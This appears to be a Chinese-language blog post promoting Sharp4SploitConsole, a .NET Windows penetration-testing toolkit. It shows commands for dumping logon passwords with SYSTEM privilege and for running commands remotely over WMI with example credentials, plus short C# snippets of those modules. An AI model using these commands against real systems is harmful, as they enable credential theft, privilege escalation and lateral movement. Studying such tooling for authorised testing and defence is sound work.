基本介绍 [color=rgba(0, 0, 0, 0.9)]Sharp4SploitConsole 是一个基于 .NET 开发的功能强大的 Windows 渗透测试工具集。它包含多个模块,能够执行如令牌操作、主机信息收集和横向移动等多种渗透测试任务。 [color=rgba(0, 0, 0, 0.9)] 03 基本用法 Sharp4SploitConsole 内置提供了多种命令,比如获取用户令牌、主机信息收集、横向移动等。比如获取系统登录用户密码,运行如下命令: Sharp4SploitConsole.exe getSystem logonPasswords
[color=rgba(0, 0, 0, 0.9)]另外Sharp4SploitConsole 还支持交互式控制台模式,使用户能够以伪交互方式与目标系统进行交互。使用以下命令可以进入交互式模式 Sharp4SploitConsole.exe interact[color=rgba(0, 0, 0, 0.9)]通过 WMI可以在远程机器上执行命令或启动进程。以下命令展示了如何在远程机器上启动计算器进程。 Sharp4SploitConsole.exe WMI 192.168.101.86 ivan1ee 123456 calc
[color=rgba(0, 0, 0, 0.9)] 04 功能实现 [color=rgba(0, 0, 0, 0.9)]Sharp4SploitConsole 包含一个获取系统权限(System 权限)的模块。通过命令行输入 Sharp4SploitConsole.exe getSystem logonPasswords。创建 Tokens 对象,并调用 GetSystem() 方法尝试获取系统权限。具体代码如下所示。 private static void getSystem()
{
string text = Program.ER();
Tokens tokens = new Tokens(true);
bool system = tokens.GetSystem();
Console.WriteLine(system);
}
[color=rgba(0, 0, 0, 0.9)]另外还有个强大的 WMI 模块,WMI 允许远程管理和操作 Windows 系统,对于渗透测试人员来说是一个非常有用的工具。以下是实现 WMI 命令的关键代码。 private static void wmi(string[] request)
{
List<string> values = new List<string>();
values = string.Join(" ", request).Split(new char[] { ' ' }).Skip(4).ToList<string>();
string text = string.Join(" ", values);
string ipAddress = request[1];
string username = request[2];
string password = request[3];
WMI.WmiExecuteResult result = WMI.WMIExecute(ipAddress, text, username, password);
}
[color=rgba(0, 0, 0, 0.9)]代码解析命令行参数,提取目标机器的 IP 地址、用户名、密码和要执行的命令,再使用 WMI.WMIExecute 方法在目标机器上执行命令 text,并获取执行结果。 [color=rgba(0, 0, 0, 0.9)]因此Sharp4SploitConsole 是一个强大的 Windows 渗透测试工具,通过简单的命令,用户可以轻松地获取系统信息、操作访问令牌、在网络中横向移动以及在远程机器上执行命令。工具已经打包在星球,感兴趣的朋友可以加入自取。
|